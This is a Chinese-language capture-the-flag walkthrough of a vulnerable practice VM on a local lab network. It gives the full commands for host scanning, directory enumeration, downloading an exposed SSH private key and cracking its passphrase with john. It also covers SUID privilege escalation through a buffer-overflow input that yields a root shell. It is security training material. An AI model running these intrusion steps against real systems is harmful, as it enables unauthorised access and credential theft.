python环境(python-IDE)
java环境(java-IDE)
PHP环境(phpstudy)
火狐浏览器延长支持板(需要安装HackBar扩展插件)
notepad++
kali linux
Win10(CFT工具包,为防止有后门不安装在真机)
kali
1.探测靶场ip
sudo netdiscover -r 192.168.101.1/24
(因为我本机ip是192.168.101.43,所以要探测这个网段的ip)
1.1同样也可以扫描ip地址
sudo nmap -sn 192.168.101.1/24
2.测试连通性
ping 192.168.101.22
3.挖掘开放服务信息
sudo nmap -sV 192.168.101.45
4.探测端口,获取有用的信息
在kali中打开浏览器输入192.168.101.45:31337
没有得到有用的信息,然后查看源代码
5.探测是否有隐藏的文件或信息
dirb http://192.168.101.45:31337
(robots.txt:存放着允许探测的键名以及不允许被探测的键名)
如果有robots.txt文件,则访问这个界面:http://192.168.101.45:31337/robost)
随后发现有三个地址(文件),访问taxes这个界面,然后看到第一个flag
(flag: flag1{make_america_great_again})
随后在访问.ssh这个文件来获取更多的信息,访问.ssh得到['id_rsa', 'authorized_keys', 'id_rsa.pub']
然后访问id_rsa:
http://192.168.101.45:31337/.ssh/id_rsa
会让下载私钥
然后再访问http://192.168.101.45:31337/.ssh/authorized_keys
同样让下载文件
最后下载公钥
http://192.168.101.45:31337/.ssh/id_rsa.pub
6.开始尝试登录ssh
首先要切换到桌面
cd Desktop/
(如果下载的三个文件没有可读可写的权限,那就要先赋予权限 chmod 600 id_rsa.pub 权限过多或不足都会有影响)
开始尝试登录
在authorized_keys文件的最后可以看到simon@covfefe,simon就是用户名
然后使用命令(id_rsa是私钥)
ssh -i id_rsa simon@192.168.101.45
连接之后不知道密码,只能更进一步的探测
在id_rsa中有一串秘钥,可以使用工具ssh2john来进行转换,使jhon能够识别
ssh2john id_rsa > rsacrack
(将转换后的信息保存在rsacrack文件中)
(需要安装ssh2john:sudo apt install john-data)
然后利用字典解密rsacrack信息
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
破解后就会看到密码,然后再重新ssh连接192.168.101.45
ssh -i id_rsa simon@192.168.101.45
然后输入密码starwars进入到192.168.101.45这台机器中
(但是simon并不是root用户,只是一个普通用户)
提升权限
查找具有root权限的文件
find / -perm -4000 2>/dev/null
会看到一个read_message文件,查看文件的信息后,执行read_message这个文件,然后再输入正确的命令SimonAAA会进入到这个文件中
再次执行read_message这个文件,这次输入SimonAAAAAAAAAAAAAAA/bin/sh会进入到root目录下
然后查看flag.txt这个文件,会得到第二个flag,同时,在read_message.c中会得到第三个flag
文章也是根据课程视频练习的,需要的可以私信